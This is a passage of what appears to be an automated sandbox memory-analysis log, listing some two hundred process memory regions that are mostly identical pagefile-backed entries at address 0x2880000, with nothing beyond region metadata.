0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7997 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7998 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7999 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8000 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8001 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8002 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8003 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8004 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8005 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8006 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8007 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8008 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8009 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8010 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8011 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8012 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8013 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8014 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8015 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8016 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8017 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 8018 start_va = 0x4120000 end_va = 0x413dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 8019 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8020 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8021 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8022 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8023 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8024 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8025 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8026 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8027 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8028 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8029 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8030 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8031 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8032 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8033 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8034 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8035 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8036 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8037 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8038 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8039 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8040 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8041 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8042 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8043 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8044 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8045 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8046 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8047 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8048 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8049 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8050 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8051 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8052 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8053 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8054 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8055 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8056 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8057 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8058 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8059 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8060 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8061 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8062 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8063 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8064 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8065 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8066 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8067 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8068 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8069 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8070 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8071 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8072 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8073 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8074 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8075 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8076 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8077 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8078 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8079 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8080 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8081 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8082 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8083 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8084 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8085 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8086 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8087 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8088 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8089 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8090 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8091 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8092 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8093 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8094 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8095 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8096 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8097 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8098 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8099 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8100 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8101 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8102 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8103 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8104 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8105 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8106 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8107 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8108 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8109 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8110 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8111 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8112 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8113 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8114 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8115 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8116 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8117 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8118 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8119 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8120 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8121 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8122 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8123 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8124 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8125 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8126 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 8127 start_va = 0x4120000 end_va = 0x413dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 8128 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8129 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8130 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8131 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8132 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8133 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8134 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8135 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8136 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8137 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8138 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8139 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8140 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8141 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8142 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8143 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8144 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8145 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8146 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8147 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8148 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8149 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8150 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8151 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8152 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8153 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8154 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8155 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8156 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8157 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8158 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8159 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8160 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8161 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8162 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8163 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8164 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8165 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8166 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8167 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8168 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8169 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8170 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8171 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8172 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8173 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8174 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8175 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8176 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8177 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8178 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8179 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8180 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8181 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8182 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8183 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" 